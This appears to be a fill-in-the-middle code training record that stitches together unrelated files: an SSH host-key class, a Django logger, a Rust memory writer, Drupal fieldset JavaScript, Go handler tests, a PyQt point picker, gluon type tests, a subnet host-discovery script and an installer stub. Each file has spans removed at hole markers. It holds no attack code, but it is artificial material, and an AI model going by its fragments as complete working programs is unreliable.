* Host-key either raw or base-64 encoded.
*
* @see is_base64()
*/
std::string key() const
{
return m_key.first;
}
/**
* Is the key returned by key() base64-encoded (printable)?
*/
bool is_base64() const
{
return false;
}
/**
* Type of the key algorithm e.g., ssh-dss.
*/
hostkey_type::enum_t algorithm() const
{
return detail::type_to_hostkey_type(m_key.second);
}
/**
* Printable name of the method negotiated for the key algorithm.
*/
std::string algorithm_name() const
{<|fim▁hole|> return m_algorithm_name;
}
/**
* Hostkey sent by the server to identify itself, hashed with the MD5
* algorithm.
*
* @returns Hash as binary data; it is not directly printable
* (@see hexify()).
*/
std::vector<unsigned char> md5_hash() const
{
return m_md5_hash;
}
/**
* Hostkey sent by the server to identify itself, hashed with the SHA1
* algorithm.
*
* @returns Hash as binary data; it is not directly printable
* (@see hexify()).
*/
std::vector<unsigned char> sha1_hash() const
{
return m_sha1_hash;
}
private:
std::pair<std::string, int> m_key;
std::string m_algorithm_name;
std::vector<unsigned char> m_md5_hash;
std::vector<unsigned char> m_sha1_hash;
};
/**
* Turn a collection of bytes into a printable hexidecimal string.
*
* @param bytes Collection of bytes.
* @param nibble_sep String to place between each pair of hexidecimal
* characters.
* @param uppercase Whether to use uppercase or lowercase hexidecimal.
*/
template <typename T>
std::string hexify(const T& bytes, const std::string& nibble_sep = ":",
bool uppercase = false)
{
std::ostringstream hex_hash;
if (uppercase)
hex_hash << std::uppercase;
else
hex_hash << std::nouppercase;
hex_hash << std::hex << std::setfill('0');
BOOST_FOREACH (unsigned char b, bytes)
{
if (!hex_hash.str().empty())
hex_hash << nibble_sep;
unsigned int i = b;
hex_hash << std::setw(2) << i;
}
return hex_hash.str();
}
} // namespace ssh
#endif<|fim▁end|> | |
<|file_name|>logger.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import logging, logging.handlers
from django.conf import settings
def get_logger(name, level=logging.INFO, format='[%(asctime)s] %(message)s', handler=None, filename=None):
new_logger = logging.getLogger(name)
new_logger.setLevel(level)
<|fim▁hole|> filename = filename or '%s/logs/%s.log' % (settings.HOME_DIR, name)
handler = logging.FileHandler(filename)
handler.setFormatter(logging.Formatter(format))
new_logger.addHandler(handler)
return new_logger
if hasattr(settings, 'LOG_FILENAME') and not logger:
handler = logging.handlers.TimedRotatingFileHandler(settings.LOG_FILENAME, when = 'midnight')
logger = get_logger('default', handler=handler)<|fim▁end|> | if not handler: |
<|file_name|>io.rs<|end_file_name|><|fim▁begin|>// Copyright 2012-2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use std::old_io::{IoError, IoResult, SeekStyle};
use std::old_io;
use std::slice;
use std::iter::repeat;
static BUF_CAPACITY: uint = 128;
fn combine(seek: SeekStyle, cur: uint, end: uint, offset: i64) -> IoResult<u64> {
// compute offset as signed and clamp to prevent overflow
let pos = match seek {
old_io::SeekSet => 0,
old_io::SeekEnd => end,
old_io::SeekCur => cur,
} as i64;
if offset + pos < 0 {
Err(IoError {
kind: old_io::InvalidInput,
desc: "invalid seek to a negative offset",
detail: None
})
} else {
Ok((offset + pos) as u64)
}
}
/// Writes to an owned, growable byte vector that supports seeking.
///
/// # Example
///
/// ```rust
/// # #![allow(unused_must_use)]
/// use rbml::io::SeekableMemWriter;
///
/// let mut w = SeekableMemWriter::new();
/// w.write(&[0, 1, 2]);
///
/// assert_eq!(w.unwrap(), vec!(0, 1, 2));
/// ```
pub struct SeekableMemWriter {
buf: Vec<u8>,
pos: uint,
}
impl SeekableMemWriter {
/// Create a new `SeekableMemWriter`.
#[inline]
pub fn new() -> SeekableMemWriter {
SeekableMemWriter::with_capacity(BUF_CAPACITY)
}
/// Create a new `SeekableMemWriter`, allocating at least `n` bytes for
/// the internal buffer.
#[inline]
pub fn with_capacity(n: uint) -> SeekableMemWriter {
SeekableMemWriter { buf: Vec::with_capacity(n), pos: 0 }
}
/// Acquires an immutable reference to the underlying buffer of this
/// `SeekableMemWriter`.
///
/// No method is exposed for acquiring a mutable reference to the buffer
/// because it could corrupt the state of this `MemWriter`.
#[inline]
pub fn get_ref<'a>(&'a self) -> &'a [u8] { &self.buf }
<|fim▁hole|> /// Unwraps this `SeekableMemWriter`, returning the underlying buffer
#[inline]
pub fn unwrap(self) -> Vec<u8> { self.buf }
}
impl Writer for SeekableMemWriter {
#[inline]
fn write_all(&mut self, buf: &[u8]) -> IoResult<()> {
if self.pos == self.buf.len() {
self.buf.push_all(buf)
} else {
// Make sure the internal buffer is as least as big as where we
// currently are
let difference = self.pos as i64 - self.buf.len() as i64;
if difference > 0 {
self.buf.extend(repeat(0).take(difference as uint));
}
// Figure out what bytes will be used to overwrite what's currently
// there (left), and what will be appended on the end (right)
let cap = self.buf.len() - self.pos;
let (left, right) = if cap <= buf.len() {
(&buf[..cap], &buf[cap..])
} else {
let result: (_, &[_]) = (buf, &[]);
result
};
// Do the necessary writes
if left.len() > 0 {
slice::bytes::copy_memory(&mut self.buf[self.pos..], left);
}
if right.len() > 0 {
self.buf.push_all(right);
}
}
// Bump us forward
self.pos += buf.len();
Ok(())
}
}
impl Seek for SeekableMemWriter {
#[inline]
fn tell(&self) -> IoResult<u64> { Ok(self.pos as u64) }
#[inline]
fn seek(&mut self, pos: i64, style: SeekStyle) -> IoResult<()> {
let new = try!(combine(style, self.pos, self.buf.len(), pos));
self.pos = new as uint;
Ok(())
}
}
#[cfg(test)]
mod tests {
extern crate test;
use super::SeekableMemWriter;
use std::old_io;
use std::iter::repeat;
use test::Bencher;
#[test]
fn test_seekable_mem_writer() {
let mut writer = SeekableMemWriter::new();
assert_eq!(writer.tell(), Ok(0));
writer.write(&[0]).unwrap();
assert_eq!(writer.tell(), Ok(1));
writer.write(&[1, 2, 3]).unwrap();
writer.write(&[4, 5, 6, 7]).unwrap();
assert_eq!(writer.tell(), Ok(8));
let b: &[_] = &[0, 1, 2, 3, 4, 5, 6, 7];
assert_eq!(writer.get_ref(), b);
writer.seek(0, old_io::SeekSet).unwrap();
assert_eq!(writer.tell(), Ok(0));
writer.write(&[3, 4]).unwrap();
let b: &[_] = &[3, 4, 2, 3, 4, 5, 6, 7];
assert_eq!(writer.get_ref(), b);
writer.seek(1, old_io::SeekCur).unwrap();
writer.write(&[0, 1]).unwrap();
let b: &[_] = &[3, 4, 2, 0, 1, 5, 6, 7];
assert_eq!(writer.get_ref(), b);
writer.seek(-1, old_io::SeekEnd).unwrap();
writer.write(&[1, 2]).unwrap();
let b: &[_] = &[3, 4, 2, 0, 1, 5, 6, 1, 2];
assert_eq!(writer.get_ref(), b);
writer.seek(1, old_io::SeekEnd).unwrap();
writer.write(&[1]).unwrap();
let b: &[_] = &[3, 4, 2, 0, 1, 5, 6, 1, 2, 0, 1];
assert_eq!(writer.get_ref(), b);
}
#[test]
fn seek_past_end() {
let mut r = SeekableMemWriter::new();
r.seek(10, old_io::SeekSet).unwrap();
assert!(r.write(&[3]).is_ok());
}
#[test]
fn seek_before_0() {
let mut r = SeekableMemWriter::new();
assert!(r.seek(-1, old_io::SeekSet).is_err());
}
fn do_bench_seekable_mem_writer(b: &mut Bencher, times: uint, len: uint) {
let src: Vec<u8> = repeat(5).take(len).collect();
b.bytes = (times * len) as u64;
b.iter(|| {
let mut wr = SeekableMemWriter::new();
for _ in 0..times {
wr.write(&src).unwrap();
}
let v = wr.unwrap();
assert_eq!(v.len(), times * len);
assert!(v.iter().all(|x| *x == 5));
});
}
#[bench]
fn bench_seekable_mem_writer_001_0000(b: &mut Bencher) {
do_bench_seekable_mem_writer(b, 1, 0)
}
#[bench]
fn bench_seekable_mem_writer_001_0010(b: &mut Bencher) {
do_bench_seekable_mem_writer(b, 1, 10)
}
#[bench]
fn bench_seekable_mem_writer_001_0100(b: &mut Bencher) {
do_bench_seekable_mem_writer(b, 1, 100)
}
#[bench]
fn bench_seekable_mem_writer_001_1000(b: &mut Bencher) {
do_bench_seekable_mem_writer(b, 1, 1000)
}
#[bench]
fn bench_seekable_mem_writer_100_0000(b: &mut Bencher) {
do_bench_seekable_mem_writer(b, 100, 0)
}
#[bench]
fn bench_seekable_mem_writer_100_0010(b: &mut Bencher) {
do_bench_seekable_mem_writer(b, 100, 10)
}
#[bench]
fn bench_seekable_mem_writer_100_0100(b: &mut Bencher) {
do_bench_seekable_mem_writer(b, 100, 100)
}
#[bench]
fn bench_seekable_mem_writer_100_1000(b: &mut Bencher) {
do_bench_seekable_mem_writer(b, 100, 1000)
}
}<|fim▁end|> | |
<|file_name|>datatypes.rs<|end_file_name|><|fim▁begin|>use serde_json;
use std::io;
use std::string::FromUtf8Error;
#[derive(Deserialize, Debug)]
pub struct Event {
pub version: String,
pub event: String,
pub data: DownloadComplete
}
#[derive(Deserialize, Debug)]
pub struct DownloadComplete {
pub update_id: String,
pub update_image: String,
pub signature: String
}
#[derive(Debug)]
pub enum Error {
Custom(String),
Io(io::Error),
Json(serde_json::Error),
Utf8(FromUtf8Error)
}
impl From<io::Error> for Error {
fn from(err: io::Error) -> Error {
Error::Io(err)
}
}
impl From<FromUtf8Error> for Error {
fn from(err: FromUtf8Error) -> Error {
Error::Utf8(err)<|fim▁hole|>
impl From<serde_json::Error> for Error {
fn from(err: serde_json::Error) -> Error {
Error::Json(err)
}
}<|fim▁end|> | }
} |
<|file_name|>_collapse.js<|end_file_name|><|fim▁begin|>(function ($) {
/**
* Toggle the visibility of a fieldset using smooth animations.
*/
Drupal.toggleFieldset = function (fieldset) {
var $toggle = $($(fieldset).find('[data-toggle=collapse]').data('target'));
if ($toggle.length) {
$toggle.collapse('toggle');
}
};
/**
* Scroll a given fieldset into view as much as possible.
*/
Drupal.collapseScrollIntoView = function (node) {<|fim▁hole|> var offset = document.documentElement.scrollTop || document.body.scrollTop || 0;
var posY = $(node).offset().top;
var fudge = 55;
if (posY + node.offsetHeight + fudge > h + offset) {
if (node.offsetHeight > h) {
window.scrollTo(0, posY);
}
else {
window.scrollTo(0, posY + node.offsetHeight - h + fudge);
}
}
};
Drupal.behaviors.collapse = {
attach: function (context, settings) {
$('fieldset.collapsible', context).once('collapse', function () {
var $fieldset = $(this);
// Expand fieldset if there are errors inside, or if it contains an
// element that is targeted by the URI fragment identifier.
var anchor = location.hash && location.hash != '#' ? ', ' + location.hash : '';
if ($fieldset.find('.error' + anchor).length) {
$fieldset.removeClass('collapsed');
}
var summary = $('<span class="summary"></span>');
$fieldset.
bind('summaryUpdated', function () {
var text = $.trim($fieldset.drupalGetSummary());
summary.html(text ? ' (' + text + ')' : '');
})
.trigger('summaryUpdated');
// Turn the legend into a clickable link, but retain span.fieldset-legend
// for CSS positioning.
var $legend = $('> legend .fieldset-legend', this);
$('<span class="fieldset-legend-prefix element-invisible"></span>')
.append($fieldset.hasClass('collapsed') ? Drupal.t('Show') : Drupal.t('Hide'))
.prependTo($legend);
$fieldset.find('[data-toggle=collapse]').on('click', function (e) {
e.preventDefault();
});
// Bind Bootstrap events with Drupal core events.
$fieldset
.append(summary)
.on('show.bs.collapse', function () {
$fieldset
.removeClass('collapsed')
.find('> legend span.fieldset-legend-prefix').html(Drupal.t('Hide'));
})
.on('shown.bs.collapse', function () {
$fieldset.trigger({ type: 'collapsed', value: false });
Drupal.collapseScrollIntoView($fieldset.get(0));
})
.on('hide.bs.collapse', function () {
$fieldset
.addClass('collapsed')
.find('> legend span.fieldset-legend-prefix').html(Drupal.t('Show'));
})
.on('hidden.bs.collapse', function () {
$fieldset.trigger({ type: 'collapsed', value: true });
});
});
}
};
})(jQuery);<|fim▁end|> | var h = document.documentElement.clientHeight || document.body.clientHeight || 0; |
<|file_name|>handler_test.go<|end_file_name|><|fim▁begin|>package provisioner
import (
"bytes"
"context"
"encoding/json"
"net/http"
"net/http/httptest"
"testing"
"github.com/gorilla/mux"
"github.com/pborman/uuid"
"github.com/pkg/errors"
"github.com/stretchr/testify/mock"
"github.com/supergiant/control/pkg/account"
"github.com/supergiant/control/pkg/clouds"
"github.com/supergiant/control/pkg/model"
"github.com/supergiant/control/pkg/profile"
"github.com/supergiant/control/pkg/sgerrors"
"github.com/supergiant/control/pkg/workflows"
"github.com/supergiant/control/pkg/workflows/steps"
)
type mockProvisioner struct {<|fim▁hole|>}
func (m *mockProvisioner) ProvisionCluster(ctx context.Context, kubeProfile *profile.Profile, config *steps.Config) (map[string][]*workflows.Task, error) {
return m.provisionCluster(ctx, kubeProfile, config)
}
func (m *mockProvisioner) ProvisionNode(ctx context.Context, nodeProfile profile.NodeProfile, kube *model.Kube, config *steps.Config) (*workflows.Task, error) {
return m.provisionNode(ctx, nodeProfile, kube, config)
}
type mockAccountGetter struct {
get func(context.Context, string) (*model.CloudAccount, error)
}
func (m *mockAccountGetter) Get(ctx context.Context, id string) (*model.CloudAccount, error) {
return m.get(ctx, id)
}
type mockKubeGetter struct {
get func(context.Context, string) (*model.Kube, error)
}
func (m *mockKubeGetter) Get(ctx context.Context, name string) (*model.Kube, error) {
return m.get(ctx, name)
}
type mockProfileCreator struct {
mock.Mock
}
func (m *mockProfileCreator) Create(ctx context.Context, p *profile.Profile) error {
args := m.Called(ctx, p)
return args.Error(0)
}
func TestProvisionBadClusterName(t *testing.T) {
testCases := []string{"non_Valid`", "_@badClusterName"}
for _, clusterName := range testCases {
provisionRequest := ProvisionRequest{
ClusterName: clusterName,
}
bodyBytes, _ := json.Marshal(&provisionRequest)
req, _ := http.NewRequest(http.MethodPost, "/", bytes.NewBuffer(bodyBytes))
rec := httptest.NewRecorder()
handler := Handler{}
handler.Provision(rec, req)
if rec.Code != http.StatusBadRequest {
t.Errorf("Wrong status code expected %d actual %d", http.StatusBadRequest, rec.Code)
return
}
}
}
func TestProvisionHandler(t *testing.T) {
p := &ProvisionRequest{
"test",
profile.Profile{},
"1234",
}
validBody, _ := json.Marshal(p)
testCases := []struct {
description string
expectedCode int
body []byte
getProfile func(context.Context, string) (*profile.Profile, error)
kubeGetter func(context.Context, string) (*model.Kube, error)
getAccount func(context.Context, string) (*model.CloudAccount, error)
provision func(context.Context, *profile.Profile, *steps.Config) (map[string][]*workflows.Task, error)
}{
{
description: "malformed request body",
body: []byte(`{`),
expectedCode: http.StatusBadRequest,
},
{
description: "account not found",
body: validBody,
expectedCode: http.StatusBadRequest,
getAccount: func(context.Context, string) (*model.CloudAccount, error) {
return nil, sgerrors.ErrNotFound
},
kubeGetter: func(context.Context, string) (*model.Kube, error) {
return nil, nil
},
},
{
description: "wrong cloud provider name",
body: validBody,
expectedCode: http.StatusNotFound,
getAccount: func(context.Context, string) (*model.CloudAccount, error) {
return &model.CloudAccount{}, nil
},
kubeGetter: func(context.Context, string) (*model.Kube, error) {
return nil, nil
},
},
{
description: "invalid credentials when provisionCluster",
body: validBody,
expectedCode: http.StatusInternalServerError,
getAccount: func(context.Context, string) (*model.CloudAccount, error) {
return &model.CloudAccount{
Provider: clouds.DigitalOcean,
}, nil
},
kubeGetter: func(context.Context, string) (*model.Kube, error) {
return nil, nil
},
provision: func(context.Context, *profile.Profile, *steps.Config) (map[string][]*workflows.Task, error) {
return nil, sgerrors.ErrInvalidCredentials
},
},
{
body: validBody,
expectedCode: http.StatusAccepted,
getAccount: func(context.Context, string) (*model.CloudAccount, error) {
return &model.CloudAccount{
Provider: clouds.DigitalOcean,
}, nil
},
kubeGetter: func(context.Context, string) (*model.Kube, error) {
return nil, nil
},
provision: func(ctx context.Context, profile *profile.Profile, config *steps.Config) (map[string][]*workflows.Task, error) {
config.Kube.ID = uuid.New()
return map[string][]*workflows.Task{
"master": {
{
ID: "master-task-id-1",
},
},
"node": {
{
ID: "node-task-id-2",
},
},
"cluster": {
{},
},
}, nil
},
},
}
provisioner := &mockProvisioner{}
kubeGetter := &mockKubeGetter{}
accGetter := &mockAccountGetter{}
profileCreator := &mockProfileCreator{}
profileCreator.On("Create",
mock.Anything, mock.Anything).Return(nil)
for _, testCase := range testCases {
provisioner.provisionCluster = testCase.provision
accGetter.get = testCase.getAccount
kubeGetter.get = testCase.kubeGetter
req, _ := http.NewRequest(http.MethodPost, "/", bytes.NewBuffer(testCase.body))
rec := httptest.NewRecorder()
handler := Handler{
kubeGetter: kubeGetter,
provisioner: provisioner,
accountGetter: accGetter,
profileService: profileCreator,
}
handler.Provision(rec, req)
if rec.Code != testCase.expectedCode {
t.Errorf("Wrong status code expected %d actual %d", testCase.expectedCode, rec.Code)
return
}
if testCase.expectedCode == http.StatusAccepted {
resp := ProvisionResponse{}
err := json.NewDecoder(rec.Body).Decode(&resp)
if err != nil {
t.Errorf("Unepxpected error while decoding response %v", err)
}
if len(resp.ClusterID) == 0 {
t.Errorf("ClusterID must not be empty")
}
}
}
}
func TestNewHandler(t *testing.T) {
accSvc := &account.Service{}
kubeSvc := &mockKubeService{}
p := &TaskProvisioner{}
h := NewHandler(kubeSvc, accSvc, nil, p)
if h.accountGetter == nil {
t.Errorf("account getter must not be nil")
}
if h.provisioner != p {
t.Errorf("expected provisioner %v actual %v", p, h.provisioner)
}
}
func TestHandler_Register(t *testing.T) {
h := Handler{}
r := mux.NewRouter()
h.Register(r)
expectedRouteCount := 1
actualRouteCount := 0
err := r.Walk(func(route *mux.Route, router *mux.Router, ancestors []*mux.Route) error {
if router != r {
return errors.New("wrong router")
}
actualRouteCount += 1
return nil
})
if err != nil {
t.Errorf("Unexpected error from walk router %v", err)
}
if expectedRouteCount != actualRouteCount {
t.Errorf("Wrong route count expected %d actual %d", expectedRouteCount, actualRouteCount)
}
}<|fim▁end|> | provisionCluster func(context.Context, *profile.Profile, *steps.Config) (map[string][]*workflows.Task, error)
provisionNode func(context.Context, profile.NodeProfile, *model.Kube, *steps.Config) (*workflows.Task, error) |
<|file_name|>simple_point_picker.py<|end_file_name|><|fim▁begin|># The MIT License (MIT)
#
# Copyright (c) 2016 WUSTL ZPLAB
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Authors: Erik Hvatum <[email protected]>
from PyQt5 import Qt
from ..shared_resources import UNIQUE_QGRAPHICSITEM_TYPE
class PointItem(Qt.QGraphicsRectItem):
# Omitting .type() or failing to return a unique causes PyQt to return a wrapper of the wrong type when retrieving an instance of this item as a base
# class pointer from C++. For example, if this item has a child and that child calls self.parentItem(), it would receive a Python object of type
# Qt.QGraphicsRectItem rather than PointItem unless PointItem has a correct .type() implementation.
QGRAPHICSITEM_TYPE = UNIQUE_QGRAPHICSITEM_TYPE()
def __init__(self, picker, x, y, w, h, parent_item):
super().__init__(x, y, w, h, parent_item)
self.picker = picker
flags = self.flags()
self.setFlags(
flags |
Qt.QGraphicsItem.ItemIsFocusable | # Necessary in order for item to receive keyboard events
Qt.QGraphicsItem.ItemIsSelectable |
Qt.QGraphicsItem.ItemIsMovable |
Qt.QGraphicsItem.ItemSendsGeometryChanges # Necessary in order for .itemChange to be called when item is moved
)
def itemChange(self, change, value):
if change == Qt.QGraphicsItem.ItemPositionHasChanged:
self.picker.point_item_position_has_changed.emit(self)
return super().itemChange(change, value)
def keyPressEvent(self, event):
if event.key() == Qt.Qt.Key_Delete and event.modifiers() == Qt.Qt.NoModifier:
self.picker.delete_selected()
def type(self):
return self.QGRAPHICSITEM_TYPE
# NB: deriving from Qt.QGraphicsObject is necessary in order to be a scene event filter target
class SimplePointPicker(Qt.QGraphicsObject):
"""ex:
from ris_widget.ris_widget import RisWidget
from ris_widget.examples.simple_point_picker import SimplePointPicker
rw = RisWidget()
simple_point_picker = SimplePointPicker(rw.main_view, rw.main_scene.layer_stack_item)"""
QGRAPHICSITEM_TYPE = UNIQUE_QGRAPHICSITEM_TYPE()<|fim▁hole|> def __init__(self, general_view, parent_item, points=None):
super().__init__(parent_item)
self.view = general_view
self.view.viewport_rect_item.size_changed.connect(self.on_viewport_size_changed)
self.point_items = []
self.pen = Qt.QPen(Qt.Qt.red)
self.pen.setWidth(2)
color = Qt.QColor(Qt.Qt.yellow)
color.setAlphaF(0.5)
self.brush = Qt.QBrush(color)
self.brush_selected = Qt.QBrush(Qt.QColor(255, 0, 255, 127))
parent_item.installSceneEventFilter(self)
if points:
for point in points:
self.make_and_store_point_item(Qt.QPointF(point[0], point[1]))
def boundingRect(self):
return Qt.QRectF()
def paint(self, QPainter, QStyleOptionGraphicsItem, QWidget_widget=None):
pass
def type(self):
return self.QGRAPHICSITEM_TYPE
def make_and_store_point_item(self, pos):
point_item = PointItem(self, -7, -7, 15, 15, self.parentItem())
point_item.setScale(1 / self.view.transform().m22())
point_item.setPen(self.pen)
point_item.setBrush(self.brush)
flags = point_item.flags()
point_item.setFlags(
flags |
Qt.QGraphicsItem.ItemIsFocusable | # Necessary in order for item to receive keyboard events
Qt.QGraphicsItem.ItemIsSelectable |
Qt.QGraphicsItem.ItemIsMovable |
Qt.QGraphicsItem.ItemSendsGeometryChanges
)
point_item.installSceneEventFilter(self)
self.point_items.append(point_item)
point_item.setPos(pos)
def delete_selected(self):
for idx, item in reversed(list(enumerate((self.point_items)))):
if item.isSelected():
self.scene().removeItem(item)
del self.point_items[idx]
self.point_item_list_content_reset.emit()
def sceneEventFilter(self, watched, event):
if watched is self.parentItem():
if event.type() == Qt.QEvent.GraphicsSceneMousePress and event.button() == Qt.Qt.RightButton:
self.make_and_store_point_item(event.pos())
return True
if event.type() == Qt.QEvent.KeyPress and event.key() == Qt.Qt.Key_Delete and event.modifiers() == Qt.Qt.NoModifier:
self.delete_selected()
return False
def on_viewport_size_changed(self):
scale = 1 / self.view.transform().m22()
for point_item in self.point_items:
point_item.setScale(scale)
def clear(self):
for point_item in self.point_items:
self.view.scene().removeItem(point_item)
self.point_items = []
self.point_item_list_content_reset.emit()
@property
def points(self):
return [(point_item.pos().x(), point_item.pos().y()) for point_item in self.point_items]
@points.setter
def points(self, points):
self.clear()
for point in points:
self.make_and_store_point_item(Qt.QPointF(point[0], point[1]))<|fim▁end|> |
point_item_position_has_changed = Qt.pyqtSignal(PointItem)
point_item_list_content_reset = Qt.pyqtSignal()
|
<|file_name|>prior.js<|end_file_name|><|fim▁begin|>'use strict';
var DB = require('./lib/database');
var rc_util = require('./lib/utility.js');
var modelsFactory = require('./lib/models.js');
var selective = require('./program').selective;
var Promise = require('bluebird');
module.exports = function(dbUrl, commander, lastCrawl) {
return new Promise(function(resolve, reject) {
function useLatestCrawl(latestCrawl) {
var ipps = rc_util.getIpps(latestCrawl);
if (ipps) {<|fim▁hole|> selective(ipps, commander)
.then(resolve)
.catch(reject);
}
}
if (lastCrawl) {
useLatestCrawl(lastCrawl);
} else {
rc_util.getLatestRow(dbUrl, commander.logsql)
.then(function(row) {
useLatestCrawl(JSON.parse(row.data));
})
.catch(reject);
}
});
};<|fim▁end|> | |
<|file_name|>uniqc_m.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python -Wall
# ================================================================
# Given a list, returns a list of pairs of elements and repetition counts.
# Example (with commas elided for legibility):
#
# Input: [ 1 1 1 2 2 3 3 3 3 5 5 1 1 ]
# Output: [ [3 1] [2 2] [4 3] [2 5] [2 1] ]
#
# I.e. there is a run of 3 1's, then a run of 2 2's, then a run of 4 3's, then
# 2 5's, then 2 1's. This similar to the output of the Unix "uniq -c" command,
# if the input were one number per line. However, uniq -c puts the columns in
# reverse order from what I do here.
# ================================================================
# John Kerl
# [email protected]
# 2008-01-22
# ================================================================
def uniqc(list):
rv = []
n = len(list)
if (n == 0):
return []
curri = 0
nexti = 1
head = list[curri]
count = 1
while (curri < n):
if (nexti == n): # Last element in the list
if (list[curri] == head):
rv.append([head, count])
else:
rv.append([list[curri], 1])
elif (list[curri] == list[nexti]):
count += 1
else:
rv.append([head, count])
head = list[nexti]
count = 1
curri += 1
nexti += 1
return rv
# ----------------------------------------------------------------
# Test cases:
#def test1(list):
# #print list
# #print uniqc(list)
# #print
#
# # Pipe the output to, say, expand -20.
# print list, "\t", uniqc(list)
#
#def test_uniqc():
# test1([])<|fim▁hole|># test1([8])
# test1([8, 8])
# test1([8, 9])
# test1([9, 8])
# test1([9, 9])
# test1([8, 8, 8])
# test1([8, 8, 9])
# test1([8, 9, 8])
# test1([8, 9, 9])
# test1([9, 8, 8])
# test1([9, 8, 9])
# test1([9, 9, 8])
# test1([9, 9, 9])
#
#test_uniqc()<|fim▁end|> | |
<|file_name|>test_header.py<|end_file_name|><|fim▁begin|># -*- encoding: utf-8 -*-
# from django.test import TestCase
# from block.tests.helper import check_content
# from compose.tests.factories import HeaderFactory
<|fim▁hole|># class TestHeader(TestCase):
#
# def test_content_methods(self):
# c = HeaderFactory()
# check_content(c)<|fim▁end|> | |
<|file_name|>gadt.rs<|end_file_name|><|fim▁begin|>extern crate gluon_base as base;
extern crate gluon_check as check;
extern crate gluon_parser as parser;
#[macro_use]
mod support;
use crate::check::typecheck::TypeError;
test_check! {
basic1,
r#"
type Test a =
| Int : Int -> Test Int
Int 1
"#,
"test.Test Int"
}
test_check_err! {
basic_error,
r#"
type Test a =
| Int : Int -> Test Int
Int ""
"#,
TypeError::Unification(..)
}
test_check! {
basic2,
r#"
type Test a =
| Int : Int -> Test Int
let f x : Test a -> Int =
match x with
| Int x -> x
()
"#,
"()"
}
test_check! {
basic3,
r#"
type Test a =
| Int : Int -> Test Int
let f x : Test a -> a =
match x with
| Int x -> x
()
"#,
"()"
}
test_check! {
different_types_concrete,
r#"
type Test a =
| Int : Int -> Test Int
| Float : Float -> Test Float
<|fim▁hole|> | Float x -> x
()
"#,
"()"
}
test_check! {
different_types_a,
r#"
type Test a =
| Int : Int -> Test Int
| A : a -> Test a
let f x : Test a -> a =
match x with
| Int x -> x
| A x -> x
()
"#,
"()"
}
test_check_err! {
different_types_error,
r#"
type Test a =
| Int : Int -> Test Int
| A : Test a
let f x y : Test a -> b -> a =
match x with
| Int x -> x
| A -> y
()
"#,
Unification(..)
}
test_check_err! {
using_parameter_with_specific_type_errors,
r#"
type Test a =
| Test : a -> Test Int
let f x : Test a -> a =
match x with
| Test x -> x
()
"#,
Unification(..)
}
test_check_err! {
invalid_gadt_return1,
r#"
type Test2 a = a
type Test a =
| Test : a -> Test2 Int
()
"#,
TypeConstructorReturnsWrongType { .. }
}
test_check_err! {
invalid_gadt_return2,
r#"
type Test2 a = a
type Test a =
| Test : a -> (Int -> Int)
()
"#,
TypeConstructorReturnsWrongType { .. }
}
test_check! {
match_on_none,
r#"
type Option a = | None | Some a
match None with
| Some y -> y
| None -> 1
"#,
"Int"
}<|fim▁end|> | let f x : Test a -> a =
match x with
| Int x -> x |
<|file_name|>discover.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
#
# Discover the target host types in the subnet
#
# @author: Sreejith Kesavan <[email protected]>
import arp
import oui
import ipcalc
import sys
class Discovery(object):
""" Find out the host types in the Ip range (CIDR)
NOTE: This finds mac addresses only within the subnet.
It doesn't fetch mac addresses for routed network ip's.
"""
def __init__(self):
self.__arp = arp.ARP()
self.__oui = oui.OUI()
def discover(self, address):
"""
Traverse the IP subnets and return manufacturer info.
"""
network = ipcalc.Network(address)
for ip in network:
ip = str(ip)
# Ignore broadcast IP Addresses
if '/' in address and ip == str(network.broadcast()):
print 'Ignoring broadcast ip: {broadcast}'.format(broadcast=str(network.broadcast()))
continue
mac = self.__arp.find_mac(ip)
if mac:
if len(mac.split(':')[0]) == 1:
mac = '0' + mac
manuf_str = mac.replace(':', '')[:6].upper()
manuf = self.__oui.find_manuf(manuf_str)
if manuf:
yield (ip, manuf)
def run():
if len(sys.argv) < 2:
print
print 'Usage:\t\tidiscover <ip-address/cidr>'
print 'Examples:'
print '\t\tidiscover 10.73.19.0'
print '\t\tidiscover 10.74.215/24'
print
else:
addrs = sys.argv[1:]
d = Discovery()
try:
for addr in addrs:
for ip, manuf in d.discover(addr):
print 'IP Address: {ip} Manufacturer: {manuf}'.format(ip=ip, manuf=manuf)
except KeyboardInterrupt:<|fim▁hole|> run()<|fim▁end|> | print 'Exiting...'
if __name__ == '__main__': |
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import sys, shutil
try:
from gi.repository import Gtk, Gdk, Vte, GLib, Pango, GConf, GdkPixbuf
import json, os, getpass
from pycm.pycm_globals import *
except ImportError as e:
print "Error during importing of necessaries modules.\nError is '%s'" % e<|fim▁hole|>python_path = "/usr/lib/python2.7/dist-packages/"
module_path = python_path + 'pycm'
bin_exe = '/usr/bin/pycm.py'
launcher = '/usr/share/applications/pyconnection-manager.desktop'
uid = os.getuid()
def __init__():
if uid > 0:
print "You need to be root to install pyConnection Manager"
sys.exit()
try:
remove_old()
except OSError, IOError:
print "ERROR removing old stuff"
sys.exit()
try:
create_new()
